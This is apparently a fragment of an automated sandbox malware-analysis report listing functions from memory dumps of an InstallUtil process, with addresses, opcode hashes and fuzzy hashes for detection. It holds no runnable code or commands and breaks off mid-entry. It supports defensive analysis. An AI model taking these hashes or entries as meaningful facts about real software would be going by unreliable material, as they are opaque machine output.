                                                          • API String ID: 0-3168235125
                                                          • Opcode ID: 62736ec88c0a5b8879284addd631a3d0ca093da0d7bc21f30b1734e211f42f8b
                                                          • Instruction ID: cc2bd64658d45b2a3d4d7f0156e032af9a7eca6262492b389684d8ebe066dcd5
                                                          • Opcode Fuzzy Hash: 62736ec88c0a5b8879284addd631a3d0ca093da0d7bc21f30b1734e211f42f8b
                                                          • Instruction Fuzzy Hash: C731DC30B002158FDB28AF34D65066F3ABAAF85200FA44479D406DB39ADF74DD4ACB95
                                                          Function 02426F40 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR]q
                                                          • API String ID: 0-3081347316
                                                          • Opcode ID: 9a1d02beb2c899637b1a2934f21242c6f78f64682dc3c788c25fe141825e8dc1
                                                          • Instruction ID: b04491f707a174f6cedbf9ef4e9f211476c55123b8b3d1f60861490a65d63fa6
                                                          • Opcode Fuzzy Hash: 9a1d02beb2c899637b1a2934f21242c6f78f64682dc3c788c25fe141825e8dc1
                                                          • Instruction Fuzzy Hash: AD316F71E102298BEF25CFA6C45079EB7B5FF85314F62852AE406EB340D7B5D84ACB41
                                                          Function 02426B48 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR]q
                                                          • API String ID: 0-3081347316
                                                          • Opcode ID: fd4bee07878f2145958f8624f0502522bffba4fb70503904a946aad07f3fe4d5
                                                          • Instruction ID: 4fe5cd466df18b8f7aa0f780eb223689de82192ca6ade52fcf7881f34cb3c298
                                                          • Opcode Fuzzy Hash: fd4bee07878f2145958f8624f0502522bffba4fb70503904a946aad07f3fe4d5
                                                          • Instruction Fuzzy Hash: B02126726042604FC715AB3DE4657EE3BA5DFC5304F4544ABC145CB296EA29C84EC791
                                                          Function 024291D1 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: U
                                                          • API String ID: 0-3372436214
                                                          • Opcode ID: 6be706839645dc0e2fcd5026263cfaa435660c5af9422e70cf1e621629f79ace
                                                          • Instruction ID: a8392b3cb410d385d326a9804f3698656bcf8cc1920cccbf680307a9f48172c1
                                                          • Opcode Fuzzy Hash: 6be706839645dc0e2fcd5026263cfaa435660c5af9422e70cf1e621629f79ace
                                                          • Instruction Fuzzy Hash: F821B835E006199BDB04CFA5C454ADEBBB1AF85310F60C91AEC15BB340DB709947CB51
                                                          Function 02427988 Relevance: .6, Instructions: 555COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 593f544c506acc76324d51b6ddca7a8c0a503a770584c553c52a27de9becbc35
                                                          • Instruction ID: d365efaeb128da8e305ac635c5664843f00684f9c102bfbbfb12b283393c2536
                                                          • Opcode Fuzzy Hash: 593f544c506acc76324d51b6ddca7a8c0a503a770584c553c52a27de9becbc35
                                                          • Instruction Fuzzy Hash: 43127EB87401018FDB29AB38E555A2D72A6EBC5300F518A3AE406CB765CF75DC4FDB90
                                                          Function 02424A54 Relevance: .3, Instructions: 260COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e768e89b5ff7d78346cfc3ffc3965bc2e34cb3b16cd74df26f1fe71ca94f859
                                                          • Instruction ID: 36a26b6b359ca4ac364cf0a8e6bc5bf52927a7da36a6ca0df40dd982f919d334
                                                          • Opcode Fuzzy Hash: 5e768e89b5ff7d78346cfc3ffc3965bc2e34cb3b16cd74df26f1fe71ca94f859
                                                          • Instruction Fuzzy Hash: E0B15D70E00219CFDB10CFAAD98179EBBF1EF88358F54852AD419A7354EB749889CF91
                                                          Function 024293E4 Relevance: .2, Instructions: 240COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5151f706e9b3d950a2cafaee17c8dd695531d2feba7621fde18fc916090915a2
                                                          • Instruction ID: 801226fb284b13c0e98e2c94403a201e74c40a8e53eb61c1f833656d74f05008
                                                          • Opcode Fuzzy Hash: 5151f706e9b3d950a2cafaee17c8dd695531d2feba7621fde18fc916090915a2
                                                          • Instruction Fuzzy Hash: 2F915D35A00214CFCB14DF65E594AADBBF2EF88310F64856AE806E73A5DB34ED46CB50
                                                          Function 02426CA4 Relevance: .1, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0aa4a3a811a96db1113df1410762489d2d67617d552f3265211658f652c5290
                                                          • Instruction ID: 57f990aa377c15111e7b1983b35438452c220039dc178d33f12f03e797621f0a
                                                          • Opcode Fuzzy Hash: e0aa4a3a811a96db1113df1410762489d2d67617d552f3265211658f652c5290
                                                          • Instruction Fuzzy Hash: 79510270D102288FDB14CFAAC885BEEBBB5EF48314F55811AD819AB350D774A849CB95
                                                          Function 02426CB0 Relevance: .1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7fe96fdacf83e5f74d5c4165f6436d554ef762aab8befb1585d0244fbbd60b8f
                                                          • Instruction ID: 85593eac6937450cee23e92ef93a7cbf53518c1bd2d000fa3868ee202545c47e
                                                          • Opcode Fuzzy Hash: 7fe96fdacf83e5f74d5c4165f6436d554ef762aab8befb1585d0244fbbd60b8f
                                                          • Instruction Fuzzy Hash: 33511370D102288FDB14CFAAC885B9EBBB5FF48314F55811AE819BB390D774A849CF95
                                                          Function 02421128 Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b66b8eae745f28d6d08e52e805cf8b917638482a8801a8bf6a847e5dfffee18
                                                          • Instruction ID: 62c51f573b3e19ab8eafbde1192567984e914a00b049ce8de628393887d6d0de
                                                          • Opcode Fuzzy Hash: 9b66b8eae745f28d6d08e52e805cf8b917638482a8801a8bf6a847e5dfffee18
                                                          • Instruction Fuzzy Hash: EB41DDF95022458FCB0AFF28F981E593F65EB95304B014969D141DB27EDB24690FEF60
                                                          Function 02421138 Relevance: .1, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c96275a5de7ae0ea771efa9bb50628dc2dded54d7dac6ff2525e565c2bfa1c27
                                                          • Instruction ID: 954641966ad558f93f847c2d4ead14f5e6ce6d95ceda210aa3b674f74d1daab8
                                                          • Opcode Fuzzy Hash: c96275a5de7ae0ea771efa9bb50628dc2dded54d7dac6ff2525e565c2bfa1c27
                                                          • Instruction Fuzzy Hash: 4241CAF82022458FCB0AFF28F981E593F65EB95304B008969D005DB27DDB64690EEFA0
                                                          Function 0242F351 Relevance: .1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f60c222663e6f964ae03901981bb29add217aad1430396e935d1eeb03e8784a8
                                                          • Instruction ID: c512ce5e2fa8a07b2cd14fca1d3fcd8e031f91dbeae4f2f60ea434de2a897e7b
                                                          • Opcode Fuzzy Hash: f60c222663e6f964ae03901981bb29add217aad1430396e935d1eeb03e8784a8
                                                          • Instruction Fuzzy Hash: 04319231E1061A9FCB19DF65D9946AFBBB2FF88300F51851AE806E7750DB74AC4ACB40
                                                          Function 0242F360 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c6f4bbe7e399182feb1bf7ec5d3891317e0ac98063940e68744b5161f5aff4d
                                                          • Instruction ID: e43b8f07487a683515ec9d2733026a60cce8a0cab039d181dca9ada8acc72487
                                                          • Opcode Fuzzy Hash: 0c6f4bbe7e399182feb1bf7ec5d3891317e0ac98063940e68744b5161f5aff4d
                                                          • Instruction Fuzzy Hash: 4131A231E1061A9FCB19DF65D994A9FB7B2FF88300F51851AE806E7750DBB0AC4ACB40
                                                          Function 024226A5 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df24f145231e18d64af2c21598668d2b5d35f51ed1fa26c357f1ca36c0218421
                                                          • Instruction ID: 3020e2674d4494330b8ee441f8401a8b97873ac0f8f6edc61b11a25a38810401
                                                          • Opcode Fuzzy Hash: df24f145231e18d64af2c21598668d2b5d35f51ed1fa26c357f1ca36c0218421
                                                          • Instruction Fuzzy Hash: 1641F2B0D00249DFDB10DFAAC480ADEBFB5FF48314F64802AE809AB210DB759949CF90
                                                          Function 024226B0 Relevance: .1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d91397746dfb90ee48311b8966bd657a6ee507b8036842022cb3eee4eb95be3
                                                          • Instruction ID: 2f154fee71918a690279b13845edebe6f0eb47fa426b494f9864ee4b76690ebb
                                                          • Opcode Fuzzy Hash: 7d91397746dfb90ee48311b8966bd657a6ee507b8036842022cb3eee4eb95be3
                                                          • Instruction Fuzzy Hash: 2A4102B0D002499FDB10DF99C480ADEBFF5FF48314F60802AE809AB210DB759949CF90
                                                          Function 02421840 Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b3f6e86ad01a2afdfe9d1e447d793a1a3a69da452ea2a5b1c05f3c8cbaea1b7e
                                                          • Instruction ID: ab8a16dae0d6359ad2f7061154b23692fb91573fb5d7b3f1d9476d96a5c26d84
                                                          • Opcode Fuzzy Hash: b3f6e86ad01a2afdfe9d1e447d793a1a3a69da452ea2a5b1c05f3c8cbaea1b7e
                                                          • Instruction Fuzzy Hash: 9A31A075B00224CFDF14EB36D950AAE77F2EB49204F50046AD50EEB3A1DB318D4ACBA5
                                                          Function 02421340 Relevance: .1, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 445d9cf7a1f0410c0f1848a121b91897a1c8e7763943ea4ee88773554c41de4b
                                                          • Instruction ID: 0f705060cf420da96c6c50c98157db6a3d47e91e84d7a11378ef2a093c32586f
                                                          • Opcode Fuzzy Hash: 445d9cf7a1f0410c0f1848a121b91897a1c8e7763943ea4ee88773554c41de4b
                                                          • Instruction Fuzzy Hash: 8321B774A402108FFF396729F684B2A3756EB81315F400D26E00EC7366E769984FCB91
                                                          Function 02421667 Relevance: .1, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70c169e16182dcb03acc99418dfe5c366d30de7e0333e57e52b63d26760ee7fa
                                                          • Instruction ID: 4fff9b979c7233fd96dc7eb172331e03597e45143c9bdffa41d2f8611e542993
                                                          • Opcode Fuzzy Hash: 70c169e16182dcb03acc99418dfe5c366d30de7e0333e57e52b63d26760ee7fa
                                                          • Instruction Fuzzy Hash: 0F31A574A011504FEB26AB25E889F7E3769EB85304F544966D00ECB27BEB28C94FCB51
                                                          Function 024292D1 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bc1847828a5d36c01625c8477b316b6759cd7186208d50d588941e28cddafb54
                                                          • Instruction ID: 6a0e3393a5486b06e6274d96cf423b560dfb785d4b2705af5d6587b23e46e308
                                                          • Opcode Fuzzy Hash: bc1847828a5d36c01625c8477b316b6759cd7186208d50d588941e28cddafb54
                                                          • Instruction Fuzzy Hash: 0331B171E102168BDB15CF65D5907DEB7B2EF89300F64C52AE405EB390DBB0988ACB90
                                                          Function 02427059 Relevance: .1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65f362c6224a975dad4452c055553d8793a75607566266a1b8a685d2f26a23bd
                                                          • Instruction ID: a3e9a2da73c8a786793bd19b066b086b0596715332906e190eb3e05d64a24d3f
                                                          • Opcode Fuzzy Hash: 65f362c6224a975dad4452c055553d8793a75607566266a1b8a685d2f26a23bd
                                                          • Instruction Fuzzy Hash: 6D212C797002148FDB09EB74E454A2D37AAEF88704F208868D40ADB3A9DE359C4BCB91
                                                          Function 02421788 Relevance: .1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e307bec4a125042653e9e939c88830a8cbd0e64a469fa613c0103dc3823e554
                                                          • Instruction ID: 85794029c7916bd6a1e00f6fca409d1f4017f6bfea4d9b279f2d27edc4ed1338
                                                          • Opcode Fuzzy Hash: 6e307bec4a125042653e9e939c88830a8cbd0e64a469fa613c0103dc3823e554
                                                          • Instruction Fuzzy Hash: 082104BAF012109FDF10AB79E844B6E37A6EBC8650F104836E50DC3355EB34C90B8B91
                                                          Function 024292E0 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22d7c4f271d626e8de025dcb81fe5104a9d31c08eaee75c7c6653c01f57f7757
                                                          • Instruction ID: 49d2049c2e07c68f4d9bb966507f139ea7ae558a390c105a365aa2ec85e4100f
                                                          • Opcode Fuzzy Hash: 22d7c4f271d626e8de025dcb81fe5104a9d31c08eaee75c7c6653c01f57f7757
                                                          • Instruction Fuzzy Hash: B6218231E0021A9BDB15CF65D59069EF7B2FF89300F64C52AE805EB390DBB1984ACB90
                                                          Function 00A4D3EC Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2445846791.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_a4d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69a1a1b3e3495838f8684666ccfec61dfa80b9c8558a1f17181e4f9e7d686331
                                                          • Instruction ID: 3ea531b419a07eb80389c3f36f2e37f377fb8d824fe6a664ce1dacb75fa7e7c5
                                                          • Opcode Fuzzy Hash: 69a1a1b3e3495838f8684666ccfec61dfa80b9c8558a1f17181e4f9e7d686331
                                                          • Instruction Fuzzy Hash: 742100B9500204EFCB05DF14D9C0B26BF65FBD8320F20C5A9E9090B256C33AE856DAA2
                                                          Function 02421452 Relevance: .1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9f32622a65c0bd4977f27a8e4cc8a18bd111de58df4e8da175f81e430c6f7c8b
                                                          • Instruction ID: e78cf26081111aa4e47706dd84902e8138fd79322b3a0b7991f511f35ab1c540
                                                          • Opcode Fuzzy Hash: 9f32622a65c0bd4977f27a8e4cc8a18bd111de58df4e8da175f81e430c6f7c8b
                                                          • Instruction Fuzzy Hash: 71219371A002249FCF21EBBA85407AE77E5EB48214F94047BD90DDB341E735C84ACB91
                                                          Function 00D3D01C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446023439.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_d3d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e152e42e4ed0968c2362e1bdaaa42150686deca2abcd1e54d085cb893fba8513
                                                          • Instruction ID: 5ed2874b9474940f787744cb57d01d78320d9dea9de23df6333920f7e75e9d66
                                                          • Opcode Fuzzy Hash: e152e42e4ed0968c2362e1bdaaa42150686deca2abcd1e54d085cb893fba8513
                                                          • Instruction Fuzzy Hash: 1721F271604204DFCB18DF24E9C4B26BF66FB88714F24C569E94A4B296C33AD807CE71
                                                          Function 024291E0 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5dcad1345b0f045137c5ab48e9466ade33821cad4ab4b58a870be333f14d8efa
                                                          • Instruction ID: a367b546e876ed8c2dfdc9716c940c9ed2d1b773dc969b8c35cd4487f59cbb86
                                                          • Opcode Fuzzy Hash: 5dcad1345b0f045137c5ab48e9466ade33821cad4ab4b58a870be333f14d8efa
                                                          • Instruction Fuzzy Hash: 8F21A734E00619DBDB18CFA6C454A9EF7B2BF89300F60891BE815FB340DB709846CB51
                                                          Function 02421850 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 914a233fcb80215f64c845aac42bd1a1d6bf26281b359c0a9881081e3b1d382e
                                                          • Instruction ID: 4b7b0da25fe1f6cdef5335a01bea7d80c20616195bd90c1f29749b6d97d0a026
                                                          • Opcode Fuzzy Hash: 914a233fcb80215f64c845aac42bd1a1d6bf26281b359c0a9881081e3b1d382e
                                                          • Instruction Fuzzy Hash: 0C215E70B00214CFDB18EB76C5547AE77F6AF49204F600469D10AEB3A1DB359D49CB95
                                                          Function 02421678 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 298349e10b3142269a8de57688303d90626afa36c014dbcea45dc1cee2ffe0c3
                                                          • Instruction ID: 3a4db83e0c7246893aa6cc42b4e7531e6cd5808c5c58e93fa5db7b9ece58357d
                                                          • Opcode Fuzzy Hash: 298349e10b3142269a8de57688303d90626afa36c014dbcea45dc1cee2ffe0c3
                                                          • Instruction Fuzzy Hash: 172162386011114FEB26AB65E884F2E375AEBC5314F504965D00DCB27AEB24D84ECB91
                                                          Function 02420848 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c14ff6f46a954e88e3a79517b64157485618d43ec868a84dae3cf35b1976c664
                                                          • Instruction ID: b73546afff0e87760284d51495d6622d313aadad29f4f17a1dc808e6c0b6536c
                                                          • Opcode Fuzzy Hash: c14ff6f46a954e88e3a79517b64157485618d43ec868a84dae3cf35b1976c664
                                                          • Instruction Fuzzy Hash: 9911C130B002288FEF64AA7AD44472F77D5EF95310F90593BE006CB3A4DB24C88A8BC0
                                                          Function 00D3D005 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446023439.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_d3d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bff09bda50d191184aa840dc5c6be3334addee28a4a0b510cdb36aea909334ba
                                                          • Instruction ID: 1f0059ee9cfc4b85e5b2bd3c43e7c29f25b11dc3eced6409059fdc957471fe92
                                                          • Opcode Fuzzy Hash: bff09bda50d191184aa840dc5c6be3334addee28a4a0b510cdb36aea909334ba
                                                          • Instruction Fuzzy Hash: BC2192755093C08FCB06CF24D994715BF72EB46314F28C5EAD8498F2A7C33A980ACB62
                                                          Function 02420838 Relevance: .1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56664609b4d4c5b8a87efad21b7c0d32519f95a2416d18f2c370ec66ad154fbc
                                                          • Instruction ID: 4f7fa5c89185a63ceece43b909bfae9ee1b5aaa9f74c2eeecae4664dfbf36223
                                                          • Opcode Fuzzy Hash: 56664609b4d4c5b8a87efad21b7c0d32519f95a2416d18f2c370ec66ad154fbc
                                                          • Instruction Fuzzy Hash: 4211E030B003288FEF245A76E84472F76C5EBA1210F90593BE002DB391EB64C88D8BC1
                                                          Function 00A4D3E7 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2445846791.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_a4d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                          • Instruction ID: 11cce41c67d0b800f15bf44714eda6029e9c0736bea71710504e4f2e9d0390d1
                                                          • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                          • Instruction Fuzzy Hash: FB11E676504240DFCB06CF10D5C4B16BF72FB94324F24C5A9D9490B656C33AE85ACBA2
                                                          Function 02421460 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2c95ff8b06e614a6e0bf0f009412452291f32c1d3c2511d8d6a218b1ed124e78
